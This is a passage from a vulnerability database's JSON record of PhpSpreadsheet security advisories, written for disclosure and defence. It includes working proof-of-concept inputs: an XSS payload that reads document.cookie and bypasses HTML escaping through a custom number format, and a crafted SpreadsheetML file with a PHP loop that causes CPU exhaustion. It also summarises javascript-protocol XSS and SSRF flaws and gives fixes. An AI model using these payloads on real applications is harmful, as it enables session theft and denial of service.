...);\n}\n```\n\nWhen a cell has a custom number format containing `@` (text placeholder) with any additional literal characters, the formatter replaces `@` with the cell value and adds the extra characters. 
This makes `$cellData !== $origData`, so `htmlspecialchars()` is **skipped entirely**.\n\nEven a single trailing space in the format (`@ `) is enough to bypass the escape.\n\n## Proof of Concept\n\n```php\nuse PhpOffice\\PhpSpreadsheet\\Spreadsheet;\nuse PhpOffice\\PhpSpreadsheet\\Writer\\Html;\nuse PhpOffice\\PhpSpreadsheet\\Cell\\DataType;\n\n$spreadsheet = new Spreadsheet();\n$sheet = $spreadsheet->getActiveSheet();\n\n// XSS payload with malicious number format\n$sheet->setCellValueExplicit('A1', '<img src=x onerror=alert(document.cookie)>', DataType::TYPE_STRING);\n$sheet->getStyle('A1')->getNumberFormat()->setFormatCode('. @');\n\n$writer = new Html($spreadsheet);\n$writer->save('output.html');\n```\n\nThe generated HTML contains:\n```html\n<td>. <img src=x onerror=alert(document.cookie)></td>\n```\n\nThe XSS payload is **completely unescaped**.\n\n## Tested Bypass Formats\n\n| Format Code | Result | Escaped? |\n|---|---|---|\n| `General` (default) | Original value | YES (safe) |\n| `. @` | `. ` + value | **NO (XSS!)** |\n| `@ ` (trailing space) | value + ` ` | **NO (XSS!)** |\n| `x@` | `x` + value | **NO (XSS!)** |\n\nThis was tested with PhpSpreadsheet 4.5.0 and confirmed the XSS executes in the browser.\n\n## Impact\n\nAny application that:\n1. Accepts uploaded XLSX files from users\n2. Converts them to HTML using PhpSpreadsheet's HTML writer\n3. Displays the HTML to other users\n\n...is vulnerable to stored XSS. 
The attacker embeds the payload in a cell value and sets a custom number format in the XLSX file's `xl/styles.xml`.\n\n## Suggested Fix\n\nAlways apply `htmlspecialchars()` regardless of whether formatting changed the value:\n\n```php\n// Instead of conditional escaping:\n$cellData = htmlspecialchars($cellData, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');\n```\n\nOr escape AFTER formatting, not conditionally based on equality.\n\n## Reporter\nKeyvan Hardani","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40296","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01724","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.0173","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0242","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02476","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0246","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40296"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hrmw-qprp-wgmc","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_
system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T14:02:42Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hrmw-qprp-wgmc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40296","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40296"},{"reference_url":"https://github.com/advisories/GHSA-hrmw-qprp-wgmc","reference_id":"GHSA-hrmw-qprp-wgmc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hrmw-qprp-wgmc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110319?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.30.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.30.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110318?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.16","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.16"},{"url":"http://public2.vulnerablecode.io/api/packages/110317?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.4.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.4.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110316?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.10.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.10.5"},{"url":"http
://public2.vulnerablecode.io/api/packages/110315?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@5.7.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@5.7.0"}],"aliases":["CVE-2026-40296","GHSA-hrmw-qprp-wgmc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qz8g-w1uw-c7bb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90024?format=json","vulnerability_id":"VCID-raun-sztd-gub9","summary":"PhpSpreadsheet has CPU Denial of Service via Unbounded Row Index in SpreadsheetML XML Reader\n## Summary\n\nThe SpreadsheetML XML reader (`Reader\\Xml`) does not validate the `ss:Index` row attribute against the maximum allowed row count (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a SpreadsheetML XML file with `ss:Index=\"999999999\"` on a `<Row>` element, which inflates the internal `cachedHighestRow` to ~1 billion. Any subsequent call to `getRowIterator()` without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service.\n\n## Details\n\nIn `src/PhpSpreadsheet/Reader/Xml.php`, the `loadSpreadsheetFromFile` method processes `<Row>` elements:\n\n```php\n// Xml.php:397-402\nif (isset($row_ss['Index'])) {\n    $rowID = (int) $row_ss['Index']; // No validation against MAX_ROW\n}\nif (isset($row_ss['Hidden'])) {\n    $rowVisible = ((string) $row_ss['Hidden']) !== '1';\n    $spreadsheet->getActiveSheet()->getRowDimension($rowID)->setVisible($rowVisible);\n}\n```\n\nThe `$rowID` value read from `ss:Index` is cast to int with no upper bound check. 
It is then passed to `getRowDimension()`:\n\n```php\n// Worksheet.php:1342-1351\npublic function getRowDimension(int $row): RowDimension\n{\n    if (!isset($this->rowDimensions[$row])) {\n        $this->rowDimensions[$row] = new RowDimension($row);\n        $this->cachedHighestRow = max($this->cachedHighestRow, $row);\n    }\n    return $this->rowDimensions[$row];\n}\n```\n\nThis inflates `cachedHighestRow` to the attacker-controlled value. Additionally, at line 412, `$cellRange = $columnID . $rowID` is constructed and passed to `getCell()`, which calls `createNewCell()` (Worksheet.php:1294) and also sets `cachedHighestRow`.\n\nThe `RowIterator` constructor uses `getHighestRow()` as its default end row:\n\n```php\n// RowIterator.php:84-88\npublic function resetEnd(?int $endRow = null): static\n{\n    $this->endRow = $endRow ?: $this->subject->getHighestRow();\n    return $this;\n}\n```\n\nWith `cachedHighestRow` at ~1 billion, iterating over rows causes CPU exhaustion. The `DefaultReadFilter` provides no protection — it returns `true` for all cells.\n\nEven without the `Hidden` attribute, any cell data within the row still uses the inflated `$rowID` at line 412, so the `ss:Hidden` attribute is not required to trigger the vulnerability.\n\n## PoC\n\n1. Create `poc.xml`:\n```xml\n<?xml version=\"1.0\"?>\n<?mso-application progid=\"Excel.Sheet\"?>\n<Workbook xmlns=\"urn:schemas-microsoft-com:office:spreadsheet\"\n xmlns:ss=\"urn:schemas-microsoft-com:office:spreadsheet\">\n <Worksheet ss:Name=\"Sheet1\">\n  <Table>\n   <Row ss:Index=\"999999999\" ss:Hidden=\"1\"/>\n   <Row><Cell><Data ss:Type=\"String\">test</Data></Cell></Row>\n  </Table>\n </Worksheet>\n</Workbook>\n```\n\n2. Load and iterate:\n```php\n<?php\nrequire 'vendor/autoload.php';\nuse PhpOffice\\PhpSpreadsheet\\IOFactory;\n\n$reader = IOFactory::createReader('Xml');\n$spreadsheet = $reader->load('poc.xml');\n$sheet = $spreadsheet->getActiveSheet();\n\necho \"Highest row: \" . $sheet->getHighestRow() . 
\"\\n\";\n// Outputs: Highest row: 1000000000\n\n// This loop will attempt ~1 billion iterations → CPU exhaustion\nforeach ($sheet->getRowIterator() as $row) {\n    // Never completes\n}\n```\n\n## Impact\n\nAny PHP application that processes user-uploaded SpreadsheetML XML files using PhpSpreadsheet is vulnerable. An attacker can cause denial of service by:\n\n- Exhausting server CPU with a single small XML file (~300 bytes)\n- Blocking the PHP worker process, potentially affecting all concurrent users\n- Triggering PHP max_execution_time limits that still consume resources before killing the process\n\nThe attack requires no authentication — only the ability to upload or cause the application to process a crafted SpreadsheetML file.\n\n## Recommended Fix\n\nAdd MAX_ROW validation after reading the `ss:Index` attribute in `src/PhpSpreadsheet/Reader/Xml.php`:\n\n```php\n// After line 398:\nif (isset($row_ss['Index'])) {\n    $rowID = (int) $row_ss['Index'];\n    if ($rowID > AddressRange::MAX_ROW) {\n        $rowID = AddressRange::MAX_ROW;\n    }\n}\n```\n\nAdd the necessary import at the top of the file:\n```php\nuse PhpOffice\\PhpSpreadsheet\\Cell\\AddressRange;\n```\n\nThe same validation should also be applied to the `ss:Index` attribute on `<Cell>` elements (line 409) for the column 
dimension.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40863","reference_id":"","reference_type":"","scores":[{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17452","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17559","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17553","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17515","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17436","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40863"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-13T15:01:42Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40863","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic
_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40863"},{"reference_url":"https://github.com/advisories/GHSA-84wq-86v6-x5j6","reference_id":"GHSA-84wq-86v6-x5j6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-84wq-86v6-x5j6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110319?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.30.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.30.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110318?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.16","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.16"},{"url":"http://public2.vulnerablecode.io/api/packages/110317?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.4.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.4.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110316?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.10.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.10.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110315?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@5.7.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@5.7.0"}],"aliases":["CVE-2026-40863","GHSA-84wq-86v6-x5j6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-
raun-sztd-gub9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56572?format=json","vulnerability_id":"VCID-tebr-cwcv-3bam","summary":"PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters\n**Product:** PhpSpreadsheet\n**Version:** 3.8.0\n**CWE-ID:** CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1:** 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n**CVSS vector v.4.0:** 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n**Description:** an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link\n**Impact:** executing arbitrary JavaScript code in the browser\n**Vulnerable component:** class `PhpOffice\\PhpSpreadsheet\\Writer\\Html`, method `generateRow`\n**Exploitation conditions:** a user viewing a specially generated xml file\n**Mitigation:** additional sanitization of special characters in a string\n**Researcher: Igor Sak-Sakovskiy (Positive 
Technologies)**","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23210","reference_id":"","reference_type":"","scores":[{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29617","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29513","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29546","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29579","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29526","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23210"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/cde2926a9e2baf146783f8fd1771bbed7d1dc7b3","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-04T15:33:22Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/cde2926a9e2baf146783f8fd1771bbed7d1dc7b3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CV
E-2025-23210","reference_id":"CVE-2025-23210","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23210"},{"reference_url":"https://github.com/advisories/GHSA-r57h-547h-w24f","reference_id":"GHSA-r57h-547h-w24f","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r57h-547h-w24f"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-r57h-547h-w24f","reference_id":"GHSA-r57h-547h-w24f","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-04T15:33:22Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-r57h-547h-w24f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83996?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:compose
r/phpoffice/phpspreadsheet@1.29.9"},{"url":"http://public2.vulnerablecode.io/api/packages/83998?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.8"},{"url":"http://public2.vulnerablecode.io/api/packages/83997?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83995?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.9.0"}],"aliases":["CVE-2025-23210","GHSA-r57h-547h-w24f"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tebr-cwcv-3bam"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57976?format=json","vulnerability_id":"VCID-v6u5-m45s-tbch","summary":"PhpSpreadsheet vulnerable to SSRF when reading and 
displaying a processed HTML document in the browser\n**Product:** PhpSpreadsheet\n**Version:** 3.8.0\n**CWE-ID:** CWE-918: Server-Side Request Forgery (SSRF)\n**CVSS vector v.3.1:** 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n**CVSS vector v.4.0:** 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n**Description:** SSRF occurs when a processed HTML document is read and displayed in the browser\n**Impact:** Server-Side Request Forgery\n**Vulnerable component:** the `PhpOffice\\PhpSpreadsheet\\Worksheet\\Drawing` class, `setPath` method\n**Exploitation conditions:** getting a string from the user that is passed to the HTML reader\n**Mitigation:** improved processing of the `$path` variable of the `setPath` method of the `PhpOffice\\PhpSpreadsheet\\Worksheet\\Drawing` class is needed\n**Researcher: Aleksey Solovev (Positive Technologies)**","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54370","reference_id":"","reference_type":"","scores":[{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.33508","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.33492","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.3346","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.33439","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.33473","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54370"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"htt
ps://github.com/PHPOffice/PhpSpreadsheet/commit/334a67797ace574d1d37c0992ffe283b7415471a","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-25T14:34:28Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/334a67797ace574d1d37c0992ffe283b7415471a"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/4050f14521d70634c3320b170236574a6106eb39","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-25T14:34:28Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/4050f14521d70634c3320b170236574a6106eb39"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/81a0de2261f698404587a6421a5c6eb263c40b31","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-25T14:34:28Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/81a0de2261f698404587a6421a5c6eb263c40b31"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/ac4befd2f7ccc21a59daef606a02a3d1828ade09","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/S
I:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-25T14:34:28Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/ac4befd2f7ccc21a59daef606a02a3d1828ade09"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/c2cd0e64392438e4c6af082796eb65c1d629a266","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-25T14:34:28Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/c2cd0e64392438e4c6af082796eb65c1d629a266"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54370","reference_id":"CVE-2025-54370","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54370"},{"reference_url":"https://github.com/FriendsOfPHP/security-advisories/blob/master/phpoffice/phpspreadsheet/CVE-2025-54370.yaml","reference_id":"CVE-2025-54370.YAML","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FriendsOfPHP/security-advisories/blob/master/phpoffice/phpspreadsheet/CVE-2025-54370.yaml"},{"reference_url":"https://github.com/advisories/GHSA-rx7m-68vc-ppxh","reference_id":"GHSA-rx7m-68vc-ppxh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"
